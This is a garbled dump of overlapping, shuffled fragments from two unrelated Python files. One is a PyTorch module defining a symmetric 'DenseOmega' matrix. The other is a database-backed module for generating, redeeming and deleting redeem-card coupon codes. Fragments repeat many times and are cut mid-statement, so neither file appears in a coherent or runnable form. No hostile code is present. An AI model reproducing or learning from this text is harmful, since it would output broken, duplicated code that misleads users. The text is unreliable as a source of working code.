DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to", "c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n", "v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(),", "# the bug was not fixed to maintain compatibility with older model checkpoints", "with older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch =", "= n self.c = c # self.fc should have bias=False # but this", "have bias=False # but this does not have an effect due to the", "state with shape (batch, c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega,", "applies to vectorized state with shape (batch, c, n, 1). \"\"\" def __init__(self,", "nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to vectorized state", "Dense (+symmetric) Omega matrix which applies to vectorized state with shape (batch, c,", "to maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self,", "1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n,", "self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c,", "= c # self.fc should have bias=False # but this does not have", "c # self.fc should have bias=False # but this does not have an", "n*c) def forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1", "self).__init__() self.n = n self.c = c # self.fc should have bias=False #", "import torch import torch.nn as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix", "torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self): return 0.5*(self.fc.weight + self.fc.weight.t())", "was not fixed to maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c,", "def forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 =", "n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c", "which applies to vectorized state with shape (batch, c, n, 1). \"\"\" def", "n, c): super(DenseOmega, self).__init__() self.n = n self.c = c # self.fc should", "= nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n,", "v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x)", "forward pass below # the bug was not fixed to maintain compatibility with", "y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1))", "= torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self): return 0.5*(self.fc.weight +", "matrix which applies to vectorized state with shape (batch, c, n, 1). \"\"\"", "to vectorized state with shape (batch, c, n, 1). \"\"\" def __init__(self, n,", "\"\"\" Dense (+symmetric) Omega matrix which applies to vectorized state with shape (batch,", "def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c = c #", "to the custom forward pass below # the bug was not fixed to", "x = v.reshape((batch, self.c*self.n, 1)) y1 = torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x)", "bug was not fixed to maintain compatibility with older model checkpoints self.fc =", "compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch", "y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self): return 0.5*(self.fc.weight", "(batch, c, n, 1). \"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n =", "below # the bug was not fixed to maintain compatibility with older model", "nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x = v.reshape((batch, self.c*self.n, 1))", "Omega matrix which applies to vectorized state with shape (batch, c, n, 1).", "self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x = v.reshape((batch,", "= torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def", "pass below # the bug was not fixed to maintain compatibility with older", "n self.c = c # self.fc should have bias=False # but this does", "\"\"\" def __init__(self, n, c): super(DenseOmega, self).__init__() self.n = n self.c = c", "super(DenseOmega, self).__init__() self.n = n self.c = c # self.fc should have bias=False", "vectorized state with shape (batch, c, n, 1). \"\"\" def __init__(self, n, c):", "maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v):", "does not have an effect due to the custom forward pass below #", "as nn class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to vectorized", "not have an effect due to the custom forward pass below # the", "torch.matmul(self.fc.weight, x) y2 = torch.matmul(self.fc.weight.t(), x) return 0.5*(y1+y2).reshape((batch, self.c, self.n, 1)) def dense_matrix(self):", "this does not have an effect due to the custom forward pass below", "self.c = c # self.fc should have bias=False # but this does not", "class DenseOmega(nn.Module): \"\"\" Dense (+symmetric) Omega matrix which applies to vectorized state with", "fixed to maintain compatibility with older model checkpoints self.fc = nn.Linear(n*c, n*c) def", "checkpoints self.fc = nn.Linear(n*c, n*c) def forward(self, v): batch = v.shape[0] x =" ]
[ "if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db", "the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card", "{'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if (i + 1)", "value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code':", "redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit = 0, offset = 0):", "redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.') # Find", "= %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data", "char set for the coupon code # Modify the char set according to", "WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def", "the char set for the coupon code # Modify the char set according", "from models.DAO import DAO from utils.exception import ValidationError from utils.validation import is_money from", "the redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does", "if (i + 1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): #", "is None: raise ValidationError('user not found.') # Establish db connection dao = DAO()", "randint # Prepare the char set for the coupon code # Modify the", "= find_user(method = 'id', param = user_id) if user is None: raise ValidationError('user", "or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection dao =", "+ 1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the", "= user_id) if user is None: raise ValidationError('user not found.') # Establish db", "models.DAO import DAO from utils.exception import ValidationError from utils.validation import is_money from models.shared", "= \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def", "' LIMIT ' + limit + ' OFFSET ' + offset cursor.execute(sql) result", "FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0: sql +=", "+ offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean", "generate_random_coupon_code(): # Generate a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for", "0): # Clean the input data limit = str(limit).strip() offset = str(offset).strip() if", "not found.') # Establish db connection dao = DAO() cursor = dao.cursor() sql", "def redeem(user_id, redeem_code): # Clean the input data user_id = str(user_id).strip() redeem_code =", "16)]) def add_redeem_cards(value, batch = 1): # Clean the input data value =", "result def get_redeem_cards(limit = 0, offset = 0): # Clean the input data", "or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection dao =", "= %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit =", "batch = 1): # Clean the input data value = str(value).strip() batch =", "redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean", "redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0: sql += '", "== 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code =", "\"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance']", "redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao = DAO() cursor =", "from utils.validation import is_money from models.shared import find_user import string from random import", "input valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') #", "def get_redeem_cards(limit = 0, offset = 0): # Clean the input data limit", "int(limit) == 0: sql += ' LIMIT ' + limit + ' OFFSET", "str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card", "redeem_code = str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is", "input data redeem_code = str(redeem_code).strip() # Establish db connection dao = DAO() cursor", "if redeem_card is None: raise ValidationError('Invalid redeen code.') # Find user user =", "FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return", "sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s", "10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code", "import randint # Prepare the char set for the coupon code # Modify", "# Clean the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find", "= list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): # Generate a", "the input data limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or", "Clean the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem", "redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit", "your needs # The char set contains all upper case letters and 0", "INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i", "for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10", "% 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data", "# Establish db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE", "= \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance =", "case letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in", "exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not exists.') sql", "cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if (i +", "raise ValidationError('Invalid redeen code.') # Find user user = find_user(method = 'id', param", "value}) # Commit every 10 writes if (i + 1) % 10 ==", "redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not", "Prepare the char set for the coupon code # Modify the char set", "sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length = cursor.fetchone()['len'] return", "all upper case letters and 0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for", "result = cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the input data", "coupon code # Modify the char set according to your needs # The", "length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch", "Establish db connection dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user", "for n in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code of", "the coupon code # Modify the char set according to your needs #", "import find_user import string from random import randint # Prepare the char set", "to your needs # The char set contains all upper case letters and", "found.') # Establish db connection dao = DAO() cursor = dao.cursor() sql =", "# Clean the input data param = str(redeem_code).strip() # Establish db connection dao", "input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card", "FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): #", "'id', param = user_id) if user is None: raise ValidationError('user not found.') #", "cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao = DAO()", "= user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM", "DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as len", "LIMIT ' + limit + ' OFFSET ' + offset cursor.execute(sql) result =", "char set contains all upper case letters and 0 to 9 char_set =", "Clean the input data param = str(redeem_code).strip() # Establish db connection dao =", "is the input valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input", "= dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\"", "if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db", "database sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not", "{'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao = DAO() cursor", "parameters.') # Establish db connection dao = DAO() cursor = dao.cursor() # Query", "1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input", "# Query database sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\"", "= DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as", "= %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao", "set contains all upper case letters and 0 to 9 char_set = list(string.ascii_uppercase)", "# Query database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\"", "in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code of length 16", "Commit every 10 writes if (i + 1) % 10 == 0: dao.commit()", "str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination", "cursor = dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as len FROM", "Query database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length =", "= DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value", "limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise", "= 0): # Clean the input data limit = str(limit).strip() offset = str(offset).strip()", "= str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if", "str(redeem_code).strip() # Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise", "0: sql += ' LIMIT ' + limit + ' OFFSET ' +", "cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES", "return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch = 1):", "cursor.fetchall() return result def redeem(user_id, redeem_code): # Clean the input data user_id =", "type.') # Establish db connection dao = DAO() cursor = dao.cursor() sql =", "is None: raise ValidationError('Invalid redeen code.') # Find user user = find_user(method =", "redeem(user_id, redeem_code): # Clean the input data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip()", "dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip() # Establish", "dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance =", "= \"\"\"INSERT INTO redeem_card ( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\"", "# Clean the input data value = str(value).strip() batch = str(batch).strip() # Check", "None: raise ValidationError('user not found.') # Establish db connection dao = DAO() cursor", "str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish", "char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): # Generate", "OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return result def redeem(user_id, redeem_code):", "( redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)):", "delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip() # Establish db connection", "dao = DAO() cursor = dao.cursor() # Check if the redeem card exists", "'value': value}) # Commit every 10 writes if (i + 1) % 10", "find_user(method = 'id', param = user_id) if user is None: raise ValidationError('user not", "# Check if the redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The", "the input valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.')", "# Clean the input data limit = str(limit).strip() offset = str(offset).strip() if not", "= str(value).strip() batch = str(batch).strip() # Check is the input valid if not", "ValidationError('user not found.') # Establish db connection dao = DAO() cursor = dao.cursor()", "%(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection dao =", "n in range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean the input", "( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value})", "= 0, offset = 0): # Clean the input data limit = str(limit).strip()", "0, offset = 0): # Clean the input data limit = str(limit).strip() offset", "The char set contains all upper case letters and 0 to 9 char_set", "def find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip() # Establish db", "# Query database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql) length", "valid if not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish", "code.') # Find user user = find_user(method = 'id', param = user_id) if", "balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql,", "def count_records_length(): # Establish db connection dao = DAO() cursor = dao.cursor() #", "* FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0: sql", "ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0: sql += ' LIMIT", "%(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit", "Check if the redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem", "ValidationError('IInvalid pagination parameters.') # Establish db connection dao = DAO() cursor = dao.cursor()", "ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code", "# Establish db connection dao = DAO() cursor = dao.cursor() # Query database", "offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.')", "dao = DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code)", "range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code of length 16 return", "cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input data param =", "ASC\"\"\" if not int(limit) == 0: sql += ' LIMIT ' + limit", "is_money from models.shared import find_user import string from random import randint # Prepare", "cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result def get_redeem_cards(limit = 0, offset", "not int(limit) == 0: sql += ' LIMIT ' + limit + '", "def generate_random_coupon_code(): # Generate a coupon code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)])", "1): # Clean the input data value = str(value).strip() batch = str(batch).strip() #", "needs # The char set contains all upper case letters and 0 to", "code of length 16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def", "user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card", "' + limit + ' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall()", "Clean the input data value = str(value).strip() batch = str(batch).strip() # Check is", "connection dao = DAO() cursor = dao.cursor() sql = \"\"\"UPDATE user SET balance", "the input data redeem_code = str(redeem_code).strip() # Establish db connection dao = DAO()", "+= ' LIMIT ' + limit + ' OFFSET ' + offset cursor.execute(sql)", "Query database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql,", "0 to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def", "does not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql,", "string from random import randint # Prepare the char set for the coupon", "dao.cursor() # Check if the redeem card exists if find_redeem_card(redeem_code) is None: raise", "sql += ' LIMIT ' + limit + ' OFFSET ' + offset", "0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip()", "= find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.') # Find user", "every 10 writes if (i + 1) % 10 == 0: dao.commit() dao.commit()", "range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean the input data value", "None: raise ValidationError('Invalid redeen code.') # Find user user = find_user(method = 'id',", "get_redeem_cards(limit = 0, offset = 0): # Clean the input data limit =", "= DAO() cursor = dao.cursor() # Check if the redeem card exists if", "Clean the input data limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal()", "Find user user = find_user(method = 'id', param = user_id) if user is", "+ ' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return result def", "redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db connection", "\"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code):", "= 'id', param = user_id) if user is None: raise ValidationError('user not found.')", "import ValidationError from utils.validation import is_money from models.shared import find_user import string from", "batch = str(batch).strip() # Check is the input valid if not is_money(value) or", "cursor = dao.cursor() # Check if the redeem card exists if find_redeem_card(redeem_code) is", "not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') # Establish db connection", "add_redeem_cards(value, batch = 1): # Clean the input data value = str(value).strip() batch", "str(value).strip() batch = str(batch).strip() # Check is the input valid if not is_money(value)", "raise ValidationError('user not found.') # Establish db connection dao = DAO() cursor =", "WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish db", "def delete_redeem_card(redeem_code): # Clean the input data redeem_code = str(redeem_code).strip() # Establish db", "is None: raise ValidationError('The redeem card does not exists.') sql = \"\"\"DELETE FROM", "card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card does not exists.')", "find_redeem_card(redeem_code): # Clean the input data param = str(redeem_code).strip() # Establish db connection", "not is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection", "redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code", "[char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code(): # Generate a coupon code", "Modify the char set according to your needs # The char set contains", "= str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor() #", "is_money(value) or not batch.isdecimal(): raise ValidationError('Invalid input type.') # Establish db connection dao", "from models.shared import find_user import string from random import randint # Prepare the", "dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code =", "cursor = dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card ORDER", "dao.cursor() # Query database sql = \"\"\"SELECT count(redeem_code) as len FROM redeem_card\"\"\" cursor.execute(sql)", "+ redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql = \"\"\"DELETE FROM redeem_card WHERE", "redeem_code ASC\"\"\" if not int(limit) == 0: sql += ' LIMIT ' +", "= str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid pagination parameters.') #", "# The char set contains all upper case letters and 0 to 9", "sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance", "redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the input", "database sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code':", "if not int(limit) == 0: sql += ' LIMIT ' + limit +", "16 return ''.join([str(char_set[randint(0, len(char_set)-1)]) for n in range(0, 16)]) def add_redeem_cards(value, batch =", "sql = \"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit)", "for n in range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean the", "in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every 10 writes if", "for the coupon code # Modify the char set according to your needs", "if the redeem card exists if find_redeem_card(redeem_code) is None: raise ValidationError('The redeem card", "DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT * FROM redeem_card", "param = user_id) if user is None: raise ValidationError('user not found.') # Establish", "WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def find_redeem_card(redeem_code): # Clean the", "input data limit = str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not", "# Commit every 10 writes if (i + 1) % 10 == 0:", "from utils.exception import ValidationError from utils.validation import is_money from models.shared import find_user import", "dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card ( redeem_code,", "data redeem_code = str(redeem_code).strip() # Establish db connection dao = DAO() cursor =", "redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) dao.commit() def count_records_length(): # Establish", "sql = \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code})", "= %(new_balance)s WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance':", "= dao.cursor() sql = \"\"\"UPDATE user SET balance = %(new_balance)s WHERE user_id =", "the input data param = str(redeem_code).strip() # Establish db connection dao = DAO()", "BY redeem_code ASC\"\"\" if not int(limit) == 0: sql += ' LIMIT '", "connection dao = DAO() cursor = dao.cursor() # Query database sql = \"\"\"SELECT", "# Prepare the char set for the coupon code # Modify the char", "count_records_length(): # Establish db connection dao = DAO() cursor = dao.cursor() # Query", "# Establish db connection dao = DAO() cursor = dao.cursor() # Check if", "(i + 1) % 10 == 0: dao.commit() dao.commit() def delete_redeem_card(redeem_code): # Clean", "param = str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor()", "to 9 char_set = list(string.ascii_uppercase) [char_set.append(n) for n in range(0, 10)] def generate_random_coupon_code():", "pagination parameters.') # Establish db connection dao = DAO() cursor = dao.cursor() #", "= str(limit).strip() offset = str(offset).strip() if not limit.isdecimal() or not offset.isdecimal(): raise ValidationError('IInvalid", "data user_id = str(user_id).strip() redeem_code = str(redeem_code).strip() # Find redeem card redeem_card =", "utils.validation import is_money from models.shared import find_user import string from random import randint", "user = find_user(method = 'id', param = user_id) if user is None: raise", "input data param = str(redeem_code).strip() # Establish db connection dao = DAO() cursor", "= \"\"\"SELECT * FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result", "= %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id': user_id}) sql", "= cursor.fetchone() return result def get_redeem_cards(limit = 0, offset = 0): # Clean", "* FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone()", "Find redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen", "exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code})", "redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code': redeem_code}) result = cursor.fetchone() return result", "connection dao = DAO() cursor = dao.cursor() sql = \"\"\"INSERT INTO redeem_card (", "WHERE user_id = %(user_id)s\"\"\" new_balance = user['balance'] + redeem_card['value'] cursor.execute(sql, {'new_balance': new_balance, 'user_id':", "str(redeem_code).strip() # Establish db connection dao = DAO() cursor = dao.cursor() # Check", ") VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(),", ")\"\"\" for i in range(int(batch)): cursor.execute(sql, {'redeem_code': generate_random_coupon_code(), 'value': value}) # Commit every", "utils.exception import ValidationError from utils.validation import is_money from models.shared import find_user import string", "char set according to your needs # The char set contains all upper", "redeem_code, value ) VALUES ( %(redeem_code)s, %(value)s )\"\"\" for i in range(int(batch)): cursor.execute(sql,", "in range(0, 16)]) def add_redeem_cards(value, batch = 1): # Clean the input data", "\"\"\"SELECT * FROM redeem_card ORDER BY redeem_code ASC\"\"\" if not int(limit) == 0:", "redeem card redeem_card = find_redeem_card(redeem_code) if redeem_card is None: raise ValidationError('Invalid redeen code.')", "models.shared import find_user import string from random import randint # Prepare the char", "= str(batch).strip() # Check is the input valid if not is_money(value) or not", "not exists.') sql = \"\"\"DELETE FROM redeem_card WHERE redeem_code = %(redeem_code)s\"\"\" cursor.execute(sql, {'redeem_code':", "limit + ' OFFSET ' + offset cursor.execute(sql) result = cursor.fetchall() return result", "card does not exists.') sql = 